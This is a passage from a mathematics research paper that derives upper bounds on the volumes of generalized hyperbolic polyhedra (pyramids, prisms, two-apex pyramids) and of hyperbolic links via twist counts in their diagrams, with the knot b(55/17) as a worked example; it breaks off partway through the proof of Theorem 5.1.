Atkinson [8, Theorem 2.2]. Namely, if \(P\) is an ideal right-angled hyperbolic polyhedron with \(V\) vertices, then \[\frac{v_{oct}}{4}\cdot V-\frac{v_{oct}}{2}\leqslant\operatorname{vol}(P) \leqslant\frac{v_{oct}}{2}\cdot V-2v_{oct}. \tag{2}\] At the same time, both inequalities turn into equalities when \(P\) is an ideal right-angled octahedron, that is, when \(V=6\). An ideal right-angled octahedron is the unique ideal right-angled polyhedron with \(V=6\), and its volume is \(v_{oct}\). The next ideal right-angled polyhedra have \(V\geq 8\) vertices, and the upper bound can be improved. Namely, it is shown in [19, Theorem 2.3] that if \(P\) is an ideal right-angled hyperbolic polyhedron with \(V\geq 8\) vertices, then \[\operatorname{vol}(P)\leqslant\frac{v_{oct}}{2}\cdot V-\frac{5v_{oct}}{2}. \tag{3}\] The volumes of polyhedra with the number of vertices \(V\leq 21\) were tabulated in [18]. Then it was shown in [5, Theorem 1.3] that the upper bound (2) can be improved if we don't consider polyhedra with \(V\leq 24\) vertices. Namely, by virtue of [5, Theorem 2.3], if \(P\) is an ideal right-angled hyperbolic polyhedron with \(V>24\) vertices, then \[\operatorname{vol}(P)\leqslant\frac{v_{oct}}{2}\cdot V-3v_{oct}. \tag{4}\] **Theorem 2.2**.: _Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is a 1-skeleton. Then the following inequalities hold._ * _If_ \(P\) _is a tetrahedron, then_ \(\operatorname{vol}(P)\leq v_{oct}\)_._ * _If_ \(P\) _is not a tetrahedron, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-\frac{5v_{oct}}{2}.\] * _If the number of edges_ \(E>24\)_, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-3v_{oct}.\] Proof.: It follows from the Theorem 2.1 and the formulae (2), (3), (4). It is well known, see, for example, [12], that for every ideal right-angled polyhedron its skeleton is the medial graph for two polyhedra combinatorially dual to each other. ## 3. Polyhedra with trivalent vertices and triangular faces Note that if the polyhedron \(P\) has some special combinatorial properties, then the upper bound for its volume can be improved. In this section, we will present improvements in the case when the information about the numbers of trivalent vertices and triangular faces is used. First of all, we consider the _regular_ ideal \(n\)-gonal bipyramid \(B_{n}^{r}\), \(n\geq 3\), see [4]. Regular means that \(B_{n}^{r}\) is obtained by gluing together \(n\) copies of an ideal tetrahedron \(T_{n}\) around a common edge, where \(T_{n}\) is given by the dihedral angles \(\frac{2\pi}{n}\), \(\frac{(n-2)\pi}{2n}\) and \(\frac{(n-2)\pi}{2n}\) for edges incident to one of the vertices and the requirement that the dihedral angles for opposite edges of the tetrahedron are equal. That is, following the notation for ideal hyperbolic tetrahedra from [30], we can write that \(T_{n}=T(\frac{2\pi}{n},\frac{\pi}{2}-\frac{\pi}{n},\frac{\pi}{2}-\frac{\pi}{n})\). As shown in [4, Theorem 2.1], the maximum volume of an ideal \(n\)-bipyramide is reached when it is regular. The formula for the volume of the tetrahedron \(T_{n}\) is given in [4] in the following form: \[\operatorname{vol}(T_{n})=\int_{0}^{2\pi/n}-2\ln(\sin\theta)d\theta+2\int_{0} ^{\pi(n-1)/2n}-2\ln(\sin\theta)d\theta.\] By [30], this volume can also be written in terms of the Lobachevsky function as follows: \[\operatorname{vol}(T_{n})=\Lambda\left(\frac{2\pi}{n}\right)+2\Lambda\left( \frac{\pi}{2}-\frac{\pi}{n}\right)=2\Lambda\left(\frac{\pi}{n}\right),\] where we used the identities \(\Lambda(2x)=2\Lambda(x)+2\Lambda(x+\frac{\pi}{2})\) and \(\Lambda(-\theta)=-\Lambda(\theta)\). Thus, \[\operatorname{vol}(B_{n}^{r})=2n\Lambda\left(\frac{\pi}{n}\right).\] Below we will use this equality to estimate the volume of an ideal right-angled polyhedron. **Lemma 3.1**.: _Let \(P\) be an ideal right-angled hyperbolic polyhedron. Denote by \(p_{n}\), \(n\geq 3\), the number of its \(n\)-gonal faces. Then_ \[\operatorname{vol}(P)\leqslant\sum_{n\geq 3}\Lambda\left(\frac{\pi}{n} \right)p_{n}n-4v_{tet}. \tag{5}\] Proof.: Denote by \(\partial P\) the surface of the polyhedron \(P\), which naturally splits into polygons corresponding to the faces of \(P\). Let us choose a vertex \(v\) of \(P\) and connect \(v\) with other vertices of \(P\) by geodesic lines. Thus, we obtain a subdivision of \(P\) into pyramids with apex \(v\) over polygons splitting of \(\partial P\). For each resulting \(n\)-gonal pyramid, consider its double, which is an ideal \(n\)-gonal bipyramid. Since the maximum volume of an ideal \(n\)-gonal bipyramid is reached when it is regular [4, Theorem 2.1], the volume of each of the \(n\)-gonal pyramids under consideration is bounded by \(\frac{1}{2}\operatorname{vol}(B_{n}^{r})\), where, as well as above, the regular \(n\)-gonal bipyramid is denoted by \(B_{n}^{r}\). Since \(\operatorname{vol}(B_{n}^{r})=2n\Lambda\left(\frac{\pi}{n}\right)\), we get \[\operatorname{vol}(P)\leqslant\sum_{n\geq 3}\Lambda\left(\frac{\pi}{n}\right)p_{ n}n.\] Under the construction, four pyramids, based on the faces incident to \(v\), degenerate. Their contribution to the volume bound was no less than the sum of the volumes of four regular ideal tetrahedra, since \[4\cdot\frac{1}{2}\operatorname{vol}(B_{3}^{r})=4\cdot 3\Lambda\left(\frac{\pi}{3} \right)=4\cdot v_{tet}.\] Thus, the inequality (5) is obtained. By [4, Theorem 2.2], there is a bound \(\operatorname{vol}(B_{n}^{r})\leq 2\pi\ln(n/2)\) for \(n\geq 3\), with \(\operatorname{vol}(B_{n}^{r})\) growing asymptotically as \(2\pi\ln(n/2)\) for \(n\to\infty\). Using this bound for the volume of a regular bipyramid along with the inequality (5), we obtain the following result. **Corollary 3.2**.: _Let \(P\) be an ideal right-angled hyperbolic polyhedron. Denote by \(p_{n}\), \(n\geq 3\), the number of its \(n\)-gonal faces. Then_ \[\operatorname{vol}(P)\leqslant\pi\sum_{n\geq 3}\ln\left(\frac{n}{2}\right)p_{n} -4v_{tet}. \tag{6}\] Let \(P\) be an ideal right-angled hyperbolic polyhedron, and \(p_{n}\), \(n\geq 3\), denote the number of its \(n\)-gonal faces. From Euler's formula for polyhedra and from the quadrivalence of the vertices of the polyhedron \(P\) follows, see for example [19], that \[p_{3}=8+\sum_{k\geq 5}(k-4)p_{k}.\] Hence \(P\) has at least eight triangular faces. The following lemma gives the bounds for the volume of an ideal right-angled polyhedron when the information about the number of triangular faces is used. **Lemma 3.3**.: _Let \(P\) be an ideal right-angled hyperbolic polyhedron with \(V\) vertices and \(p_{3}\) triangular faces. Then_ * _The following inequality holds:_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\left(V-\frac{p_{3}+8}{4}\right).\] * _If_ \(V>24\)_, then_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\left(V-\frac{p_{3}+13}{4}\right).\] Proof.: (a) Let \(F\) be the number of faces of the polyhedron \(P\) and denote faces by \(f_{1},\dots,f_{F}\). Similar to the proof of Lemma 3.1, we consider the decomposition of the polyhedron \(P\) into ideal pyramids \(\tau_{i}\), \(i=1,\dots,F\), such that the face \(f_{i}\) is the base of \(\tau_{i}\) and all pyramids have a common apex \(v\). For each ideal pyramid \(\tau_{i}\), consider its doubling, the ideal bipyramid \(\beta_{i}\). Hence, \[\operatorname{vol}(P)=\frac{1}{2}\sum_{i=1}^{F}\operatorname{vol}(\beta_{i}).\] Let for certainty \(\tau_{i}\) be pyramid for some \(n\geq 3\). Then \(\beta_{i}\) is an \(n\)-gonal bipyramid. Let us split \(\beta_{i}\) into ideal tetrahedra. If \(n=3\), then the pyramid \(\tau_{i}\) is a tetrahedron and \(\beta_{i}\) is the union of two ideal tetrahedra along a common face, whence \(\operatorname{vol}(\beta_{i})\leq 2v_{tet}\). If \(n\geq 4\), then \(\beta_{i}\) is splittable into \(n\) ideal tetrahedra having a common edge that contains the apex \(v\) and its double \(v^{\prime}\), see the example for \(n=4\) shown in Figure 1. Thus, the volume of the \(n\)-gonal bipyramide is bounded by \(2v_{tet}\) if \(n=3\), and by \(nv_{tet}\) if \(n\geq 4\). Denote by \(E\) the number of edges of the polyhedron \(P\). Since all dihedral angles of the polyhedron \(P\) are equal to \(\pi/2\), each edge \(e\in E\) is incident to two bipyramids. Thus, the sum of incident edges over all bipyramids will be equal to twice the number of edges \(2E\) (each edge incident to the base of the pyramid in the splitting of \(P\) is counted twice). Since the sum of incident edges on triangular bipyramids is equal to \(3p_{3}\), the sum of incident edges corresponding to \(n\)-gonal bipyramids, \(n\geq 4\), is equal to \(2E-3p_{3}\). Thus, \[2\operatorname{vol}(P)\leq 2v_{tet}\cdot p_{3}+v_{tet}\cdot(2E-3p_{3})=v_{tet} \cdot(4V-p_{3}), \tag{7}\] where we used \(E=2V\) since each vertex of \(P\) is quadrivalent. In the bound (7), we did not take into account that the apex \(v\) is incident to four faces and so, four pyramids, and therefore four bipyramids degenerate into flat ones. The contribution of four bipyramids in (7) is at least \(4\cdot(2v_{tet})\), that is the case when all four bipyramids are 3-bipyramids. Therefore, \[2\operatorname{vol}(P)\leq v_{tet}\cdot(4V-p_{3}-8),\] and so \[\operatorname{vol}(P)\leq 2v_{tet}\cdot\left(V-\frac{p_{3}+8}{4}\right).\] (b) Let us choose the common apex of the pyramids in a special way. Obviously, for each vertex of \(P\) there are four adjacent vertices. Following [5], we will say that two vertices are _quasi-adjacent_ if they not adjacent, but belong to the same face. According to [5, Lemma 2.1], if ideal right-angled polyhedron has \(V>24\) vertices, there is a vertex \(v_{0}\) that is quasi-adjacent to at least four vertices. Since \(v_{0}\) has 4 adjacent vertices, we get that \(v_{0}\) is adjacent to four faces such that the sum of their sides is at least 16. Taking a splitting of \(P\) into pyramids with a common apex \(v_{0}\) we will get that at least 13 tetrahedra will degenerate. The bound holds by the same arguments as in the item (a). Now we are ready to present the volume bounds which improve Theorem 2.2 in the case when there is the additional information about numbers of trivalent vertices and triangular faces. **Theorem 3.4**.: _Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is the 1-skeleton._ Figure 1. Splitting an ideal 4-bipyramid into 4 ideal tetrahedra. 1. _If_ \(P\) _has_ \(V_{3}\) _trivalent vertices and_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\cdot\left(E-\frac{p_{3}+V_{3}+8}{4} \right).\] 2. _If all vertices of_ \(P\) _are trivalent and there are_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant\frac{5v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10} \right).\] Proof.: (a) We use notations \(V\), \(E\) and \(F\) for the number of vertices, edges and faces of the graph \(\Gamma\), and similarly, \(\overline{V}\), \(\overline{E}\) and \(\overline{F}\) for the number of vertices, edges and the faces of the 1-skeleton of the polyhedron \(\overline{\Gamma}_{tr}\). Since the 1-skeleton of \(\overline{\Gamma}_{tr}\) is the medial graph for \(\Gamma\), we have \(\overline{V}=E\), \(\overline{E}=2\overline{V}=2E\) and \(\overline{F}=V+F\). If a face of \(\overline{\Gamma}_{tr}\) corresponds to a vertex of \(\Gamma\), then the number of its sides is equal to the valence of the vertex. If a face of \(\overline{\Gamma}_{tr}\) corresponds to a face of \(\Gamma\), then the number of its sides is equal to the number of sides in the original face. Therefore, \(\overline{\Gamma}_{tr}\) has \(V_{3}+p_{3}\) triangular faces. Applying Lemma 3.1 to the polyhedron \(\overline{\Gamma}_{tr}\), we obtain the required inequality. (b) If all vertices of \(\Gamma\) are trivalent, then \(2E=3V=3V_{3}\). By substituting \(V_{3}=\frac{2}{3}E\) into the estimate from the item (a), we get: \[\operatorname{vol}P\leq 2v_{tet}\cdot\left(E-\frac{p_{3}+V+8}{4}\right)=\frac{5 v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10}\right),\] that completes the proof. **Remark 3.5**.: To compare the bounds obtained in Theorems 2.2 and 3.4, we note that the inequality \(\frac{5}{3}v_{tet}<\frac{1}{2}v_{oct}\) holds. Thus, if all the vertices of the polyhedron are trivalent, then the formulae from the Theorem 3.4 give the better asymptotics. Moreover, the inequality \[\frac{5v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10}\right)<\frac{v_{oct}}{2}\cdot E -3v_{oct}\] is equivalent to the inequality \[E+\frac{3v_{tet}}{3v_{oct}-10v_{tet}}p_{3}>\frac{6(3v_{oct}-4v_{tet})}{3v_{ oct}-10v_{tet}}.\] Using the approximate values \(v_{tet}=1.014941\) and \(v_{oct}=3.663863\), we obtain that for \[E+3.615410\cdot p_{3}>49.385163\] the bound from the Theorem 3.4 is stronger. ## 4. Pyramids, prisms and two-apex pyramids In this section we give some examples of calculating the upper bounds based on the above obtained formulas and compare them with the known volume values. ### Pyramids Note that the medial graph for the 1-skeleton of the \(n\)-gonal pyramid \(P_{n}\) is the 1-skeleton of the \(n\)-antiprism \(A(n)\), see Figure 2 for \(n=4\). Recall that the \(n\)-antiprism \(A(n)\) is an ideal right-angled polyhedron with \(2n\) 4-valent vertices, \((2n+2)\) faces, upper and lower \(n\)-angular bases and a side surface of two layers of \(n\) triangles. Let \(n=3\). The triangular pyramid \(P_{3}\) is a tetrahedron with \(E=6\) edges, \(p_{3}=4\) triangular faces, and \(V_{3}=4\) trivalent vertices. From the case (a) of the Theorem 3.4 we get \[\operatorname{vol}(P_{3})<2\,v_{tet}\,\left(6-\frac{4+4+8}{4}\right)=4\,v_{tet}.\] Recall that the formula for the volume of a generalized hyperbolic tetrahedron was given in [39]. It is well known that the medial graph for the 1-skeleton of a tetrahedron is the 1-skeleton of an octahedron. The volume of an ideal right-angled octahedron is \(v_{oct}=3.663863\). Thus, the volume of any generalized tetrahedron does not exceed \(v_{oct}\). This fact was noted in [39]. Since \(v_{oct}<4\,v_{tet}\), the estimate obtained from the Theorem 3.4 is correct, although it is not accurate. For \(n\geq 4\), the pyramid \(P_{n}\) has \(E=2n\) edges, \(p_{3}=n\) triangular faces, and \(V_{3}=n\) trivalent vertices. From the case (a) of the Theorem 3.4 we get \[\operatorname{vol}(P_{n})\leq 2\,v_{tet}\left(2n-\frac{2n+8}{4}\right)=3v_{ tet}\cdot n-4v_{tet}.\] Note that approximately \(3v_{tet}=3.044823\). Recall that the formula for the volume of an ideal right-angled hyperbolic antiprism \(A(n)\), \(n\geq 3\), is known. It was obtained by Thurston in [38]: \[\operatorname{vol}(A(n))=2n\,\left[\Lambda\left(\frac{\pi}{4}+\frac{\pi}{2n} \right)+\Lambda\left(\frac{\pi}{4}-\frac{\pi}{2n}\right)\right].\] Thus, for \(n\geq 4\), the volume of the generalized hyperbolic \(n\)-pyramid \(P_{n}\) satisfies the following inequality: \[\operatorname{vol}(P_{n})\leq 2n\,\left[\Lambda\left(\frac{\pi}{4}+\frac{\pi}{2n} \right)+\Lambda\left(\frac{\pi}{4}-\frac{\pi}{2n}\right)\right].\] The right side of the inequality is asymptotically equivalent to \(\frac{1}{2}v_{oct}\cdot n\) as \(n\to\infty\). **5.2. Prisms.** Denote by \(\Pi_{n}\) a generalized hyperbolic \(n\)-gonal prism for \(n\geq 3\), that is, a polyhedron having upper and lower \(n\)-gonal bases and \(n\) quadrangular faces on the lateral surface. The vertices of a polyhedron can be finite, ideal, or hyperideal, and the dihedral angles are such that the polyhedron can be realized in \(\mathbb{H}^{3}\). Let \(n=3\). The prism \(\Pi_{3}\) is a triangular prism that has \(E=9\) edges, \(p_{3}=2\) triangular faces, and \(V_{3}=6\) trivalent vertices. From the case (a) of the Theorem 3.4 we get that \[\operatorname{vol}(\Pi_{3})<2\,v_{tet}\cdot\left(9-\frac{2+6-8}{4}\right)=18 \,v_{tet}.\] Figure 2. Pyramid \(P_{4}\) and antiprism \(A_{4}\). At the same time, the rectification \(\Pi_{3}\) is a polyhedron composed of two octahedra, whence \(\operatorname{vol}(\Pi_{3})\leq 2v_{oct}\). Since \(2v_{oct}<18\,v_{tet}\), the estimate obtained from the Theorem 3.4 is correct, although it is not accurate. Let \(n=4\). The prism \(\Pi_{4}\) is a cube. It is easy to see that the medial graph for the 1-skeleton of a cube is the 1-skeleton of an ideal right-angled polyhedron \(Q_{14}\) with 8 triangular and 6 quadrangular faces, shown in Figure 3. Its volume is calculated in [18] and is approximately equal to 12.046092. This polyhedron is the union of two copies of the ideal antiprism \(A(4)\) along a quadrangular face. Note also that this polyhedron has the maximum volume among all nine ideal right-angled hyperbolic polyhedra with 14 faces. Let us have a unified discussion of the case \(n\geq 4\). In [9, Corollary 11] the following inequality for the volume of the prism \(\Pi_{n}\) was obtained: \[\operatorname{vol}(\Pi_{n})<\frac{3}{2}\,v_{oct}\cdot n-2\,v_{oct}. \tag{8}\] Note that \(\frac{3}{2}v_{oct}=5.495794\). Since all the vertices of the prism \(\Pi_{n}\) are trivalent and its 1-skeleton has \(E=3n\) edges, from the case (b) of the Theorem 3.4 we obtain \[\operatorname{vol}(\Pi_{n})<5\,v_{tet}\cdot n-4\,v_{tet}. \tag{9}\] Note that \(5v_{tet}=5.074705\). **Remark 4.1**.: Inequality \[5\,v_{tet}\cdot n-4\,v_{tet}<\frac{3}{2}\,v_{oct}\cdot n-2\,v_{oct}\] occurs when \[n>\frac{2v_{oct}-4v_{tet}}{\frac{3}{2}v_{oct}-5v_{tet}}.\] Substituting the specified constants by their approximate values, we get that the bound (9) improves the bound (8) for \(n>7.760616\), that is, for \(n\geq 8\). The volume formula of an ideal right-angled hyperbolic \(n\)-antiprism \(A(n)\) was obtained in [38]. Using this formula, we get \[\operatorname{vol}(\Pi_{n})<2\operatorname{vol}(A(n))=4n\left[\Lambda\left( \frac{\pi}{4}+\frac{\pi}{2n}\right)+\Lambda\left(\frac{\pi}{4}-\frac{\pi}{2n} \right)\right].\] At the same time, \(\operatorname{vol}(A(n))\) is asymptotically equivalent to \(\frac{1}{2}v_{oct}\cdot n\) for \(n\to\infty\). Figure 3. Prism \(\Pi_{4}\) and polyhedron \(Q_{14}\). ### Two-apex pyramids Consider the polyhedron \(W_{n}\), \(n\geq 4\), which is obtained from the pyramid \(P_{n}\) as follows. Split the apex of the pyramid \(P_{n}\), replacing it with two new ones and connecting them with an edge. Then we connect one of the new apexes to two adjacent vertices of the base, and connect the another new apexes to the remaining \((n-2)\) vertices of the base. As a result, the base of \(W_{n}\) is still a \(n\)-gon, and its side surface consists of two quadrilaterals and \((n-2)\) triangles, as shown in Figure 4 for \(n=6\). The polyhedron \(W_{n}\) will be called a _two-apex pyramid_. Obviously, \(W_{4}\) is a triangular prism \(\Pi_{3}\). In this sense, the family of two-apex pyramids \(W_{n}\) can be considered as a generalization of the families of pyramids and prisms discussed above. The medial graph for the \(1\)-skeleton of the two-vertex pyramid \(W_{n}\) is the \(1\)-skeleton of the polyhedron \(A(n)^{*}\), which was introduced in [18] and called a _twisted antiprism_, see Figure 4 for \(n=6\). For \(n\geq 5\), a two-apex pyramid \(W_{n}\) has \(E=2n+1\) edges, \(V_{3}=n+1\) trivalent vertices, and \(p_{3}=n-2\) triangular faces. From the case (a) of the Theorem 3.4 we obtain the following bound: \[\operatorname{vol}(W_{n})\leq 2v_{tet}\left(2n+1-\frac{(n-2)+(n+1)+8}{4}\right) =3v_{tet}\cdot n-\frac{3}{2}v_{tet}.\] Since the rectification of the polyhedron \(W_{n}\) is the polyhedron \(A(n)^{*}\), \[\operatorname{vol}(W_{n})\leq\operatorname{vol}(A(n)^{*})\] As shown in [18], the volume of the twisted antiprism can be calculated via the volume of the antiprism the following way: \[\operatorname{vol}(A(n)^{*})=\operatorname{vol}(A(n-1))+\operatorname{A}(3),\] and \(\operatorname{vol}(A(n)^{*})\) is asymptotically equivalent to \(\frac{1}{2}v_{oct}\cdot n\) as \(n\to\infty\). ## 5. Volume bound for links via the number of twists By the _volume of a hyperbolic knot or link_\(K\subset S^{3}\) we mean the volume of a hyperbolic manifold \(S^{3}\setminus K\). In this Section we will establish new upper bounds for the volumes of knots and links via the combinatorial parameters of its diagram. First of all, we recall the known bounds and illustrate these bounds for a two-bridge knot \(\mathbf{b}(\frac{55}{17})\) as an example. A diagram of \(\mathbf{b}(\frac{55}{17})\) is presented in Figure 5. This figure corresponds to a continued fraction \(\frac{55}{17}=3+\frac{1}{4+\frac{1}{4}}\) and is known as a _Conway's normal form_ for two-bridge knots and links [23, 36]. Calculating the volume by the computer program _SnapPy_[37], we get \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))=10.117141\). Figure 4. Two-apex pyramid \(W_{6}\) and twisted antiprism \(A(6)^{*}\). Apparently, the first known estimate of the volume of a hyperbolic knot \(K\) in terms of the number of crossings \(c(K)\) in its diagram was obtained in Adams dissertation [1]. It was shown that if the knot \(K\) is different from the figure-eight knot \(4_{1}\), then \[\operatorname{vol}(S^{3}\setminus K)\leq v_{tet}\cdot(4c(K)-16). \tag{10}\] Recall that \(\operatorname{vol}(S^{3}\setminus 4_{1})=2v_{tet}\). Since \(c(\mathbf{b}(\frac{55}{17}))=11\), the inequality (10) gives an estimate \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))\leq 28\cdot v_{ tet}=28.418348\). In [3], Adams improved the inequality (10) as follows: if \(c(K)\geq 5\), then \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq v_{oct}\cdot(c(K)-5)+4 \cdot v_{tet}. \tag{11}\] From inequality (11) we get \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))\leq 26.078932\). The next family of bounds for the volumes of knots and links use the number of twists in a diagram. _Twist_ in the diagram \(D\) of a knot or a link \(K\) is the maximal chain of consecutive bigon regions, see Figure 6. Equivalently, twist can be understood as a chain of several consecutive half-turns on two strands. Moreover, all half-turns are directed in one direction: either positive or negative. The number of half-turns in the twist will be called _twist length_. The number of twists in the diagram \(D\) is denoted by \(t(D)\). For example, for the diagram \(D\) shown in Figure 5 we have \(t(D)=3\). In the appendix to Luckenby's paper [28], Agol and Thurston showed that the volume of any hyperbolic link \(K\) can be estimated in terms of the number of twists \(t(D)\) in its diagram \(D\) as follows: \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot(t(D)-1). \tag{12}\] Moreover, this estimate is asymptotically sharp. By inequality (12) we get the bound \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))\leq 20\cdot v_{ tet}=20.29882\). In [16] Dasbach and Tsvetkova used additional information on twists to improve the inequality obtained by Agol and Thurston. For the diagram \(D\) of the link \(K\) denote by \(t_{i}=t_{i}(D)\) the number of twists of length \(i\) for \(i\geq 1\). Note that \(t(D)=\sum_{i\geq 1}t_{i}(D)\). Denote by \(g_{i}=g_{i}(D)\) the number of twists of length at least Figure 5. Diagram of the two-bridge knot \(\mathbf{b}(\frac{55}{17})\). Figure 6. Twist of the length five in the diagram. \(i\), \(i\geq 1\). According to [16, Theorem 2.3], if \(D\) is a reduced alternating diagram of hyperbolic alternating link \(K\), then \[\operatorname{vol}(S^{3}\setminus K)\leq v_{tet}\cdot(4t_{1}+6t_{2}+8t_{3}+10g _{4}-a), \tag{13}\] where \(a=10\) if \(g_{4}\neq 0\), \(a=7\) if \(t_{3}\neq 0\), \(a=6\) otherwise. Later in [17] Dasbach and Tsvietkova proved that the bound (13) is also true for the case when the diagram is not alternating. Adams [4, Theorem 3.1] improved the result obtained by Dasbach and Tsvietkova as follows. Let \(K\) be a hyperbolic link admitting a reduced alternating diagram \(D\) with \(c(D)\geq 5\) and \(t(D)\geq 3\). Moreover, we assume that \(K\) is not the Borromean rings \(6^{3}_{2}\). Then \[\operatorname{vol}\left(S^{3}\setminus K\right)<t_{1}\cdot v_{oct}+t_{2}\cdot 6 v_{tet}+t_{3}\cdot 16\Lambda\left(\frac{\pi}{8}\right)+t_{4}\cdot 20\Lambda \left(\frac{\pi}{10}\right)+g_{5}\cdot 10v_{tet}-a, \tag{14}\] where \[a=\begin{cases}7v_{oct}-10v_{tet},&\text{if $g_{2}=0$},\\ 11v_{tet},&\text{if $g_{3}=0$ and $t_{2}\geq 1$},\\ 32\Lambda\left(\frac{\pi}{8}\right)+5v_{tet}-v_{oct}-14\Lambda\left(\frac{ \pi}{7}\right),&\text{if $g_{4}=0$ and $t_{3}\geq 1$},\\ 40\Lambda\left(\frac{\pi}{10}\right)+12\Lambda\left(\frac{\pi}{6}\right)-2v_{ tet}-8\Lambda\left(\frac{\pi}{4}\right)-18\Lambda\left(\frac{\pi}{9}\right),&\text{if $g_{5}=0$ and $t_{4}\geq 1$},\\ 4v_{tet}+12\Lambda\left(\frac{\pi}{6}\right)+60\Lambda\left(\frac{\pi}{10} \right)-54\Lambda\left(\frac{\pi}{9}\right),&\text{if $g_{5}\geq 1$}.\end{cases} \tag{15}\] Calculating the values of the Lobachevsky function specified in (14) and (15) with an accuracy of up to six digits, we get the inequality \[\operatorname{vol}\left(S^{3}\setminus K\right)<3.663863\cdot t_{1}+6.089646 \cdot t_{2}+7.854977\cdot t_{3}+9.237551\cdot t_{4}+10.149416\cdot g_{5}-a, \tag{16}\] where \(a\) takes the following values: \[a=\begin{cases}15.497263,&\text{if $g_{2}=0$},\\ 11.164351,&\text{if $g_{3}=0$ and $t_{2}\geq 1$},\\ 10.088228,&\text{if $g_{4}=0$ and $t_{3}\geq 1$},\\ 10.287338,&\text{if $g_{5}=0$ and $t_{4}\geq 1$},\\ 12.111063,&\text{if $g_{5}\geq 1$}.\end{cases} \tag{17}\] Note that the formulae (14)-(17) give the bound \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))<16.0426\). The following bounds for the volume of an alternating knot in terms of the coefficients of its Jones polynomial were obtained by Dasbach and Lin [15]. Let \(K\) be a simple alternating knot that is not toric. Let its Jones polynomial have the form \[V_{K}(t)=a_{n}t^{n}+a_{n+1}t^{n+1}\ldots+a_{m-1}t^{m-1}+a_{m}t^{m}.\] Then \[v_{oct}(\max(|a_{m-1},|a_{n+1}|-1))\leq\operatorname{vol}(S^{3}\setminus K) \leq 10v_{3}(|a_{n+1}|+|a_{m-1}|-1). \tag{18}\] According to [27], Jones polynomial for \(\mathbf{b}(\frac{55}{17})\) is equal to \[V(t)=t^{3}-t^{4}+3t^{5}-5t^{6}+7t^{7}-8t^{8}+9t^{9}-8t^{10}+6t^{11}-4t^{12}+2t ^{13}-t^{14}.\] Hence, the following bounds hold: \[2\cdot v_{oct}\leq\operatorname{vol}\left(S^{3}\setminus\mathbf{b}\left( \frac{55}{17}\right)\right)\leq 20\cdot v_{3}.\] For the volumes of two-bridge links the upper and lower bounds were obtained in [21]. Let \(D\) be a reduced alternating diagram of a two-bridge link \(K\), then \[2v_{tet}\cdot t(D)-2.7066\leq\operatorname{vol}(S^{3}\setminus K)\leq 2v_{oct} \cdot(t(D)-1).\] The obtained bounds were used in [32] to estimate Matveev's complexity of hyperbolic 3-manifolds represented as cyclic branched covers of 2-bridge knots and links. The proof of the upper bound is based on the fact that the full augmentation without half-turns (see a definition below) of a two-bridge link with \(t(D)\) twists is the belt sum of \(t(D)\) copies of Borromean rings. Applying the last bound to \(\mathbf{b}(\frac{55}{17})\), we get: \[6\cdot v_{tet}-2.7066\leq\operatorname{vol}\left(S^{3}\setminus\mathbf{b} \left(\frac{55}{17}\right)\right)\leq 4\cdot v_{oct}.\] Now we go back to considering arbitrary hyperbolic knots and links. In the Theorem 5.1 we obtain an inequality that improves the bounds (12) and (14) for the cases when the number of twists in the diagram is large enough. **Theorem 5.1**.: _Let \(D\) be a hyperbolic diagram of a link \(K\) with \(t(D)\) twists. If \(t(D)>\)8, then_ \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot(t(D)-1.4). \tag{19}\] Figure 7. Conway’s normal forms for 2-bridge links and knots. Proof.: Starting from a diagram of \(K\) we will construct a link \(L\) such that \(\operatorname{vol}(S^{3}\setminus K)<\operatorname{vol}(S^{3}\setminus L)\) and bound the volume of the manifold \(S^{3}\setminus L\) by splitting it into two ideal right-angled polyhedra. Step 1. Let \(D\) be a diagram of a link \(K\) with \(t=t(D)\) twists. Denote the lengths of the twists by \(n_{1},n_{2},\ldots,n_{t}\). Similarly to [28] and [33, Chapter 7], we construct a new link from the diagram \(D\) as follows. If \(|n_{i}|\geq 2\) then replace the maximum possible number of full turns \(\lfloor\frac{|n_{i}|}{2}\rfloor\) in the \(i\)-th twist, \(i=1,\ldots,t\), with a new link component that covers this twist. If \(|n_{i}|=1\) then we just add a new link component that cover the twist. The resulting link \(J\) is called _full augmentation_ of the link \(K\) (see, for example, [33]). Thus, \(J\) has \(t(D)\) more components than the original link \(K\). The new components in \(J\) will be further referred to as _vertical_. Note that the initial link \(K\) can be obtained by Dehn's surgeries on vertical components of \(J\). For example, the knot diagram \(\mathbf{b}(\frac{55}{17})\), shown in Figure 5, has twists of length \(3\), \(4\) and \(4\). The corresponding link \(J_{4}\) has \(4\) components and shown in the Figure 8. Three of the four components of the link \(J_{4}\) are vertical, and surgeries on these components give the knot \(\mathbf{b}(\frac{55}{17})\). Hence, \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))<\operatorname{vol }(S^{3}\setminus J_{4})\). Step 2. If the twist in \(D\) had an odd length, then one half-turn will remain from it in the diagram of a link \(J\). Let us change the link \(J\) to the link \(L\) which does not have such half-turns. To do this, we apply _Adams transformation_, shown in the Figure 9, the required number of times. The resulting link \(L\) is called _full augmentation without half-turns_ of the link \(K\) (see, for example, terminology from [26]). As shown by Adams [2, Corollary 5.1], the application of this transformation preserves the property of link to be hyperbolic and does not change the volume, hence \(\operatorname{vol}(S^{3}\setminus J)=\operatorname{vol}(S^{3}\setminus L)\). Note that links \(J\) and \(L\) have the same number of vertical components and \(L\) has no half-turns in the diagram. 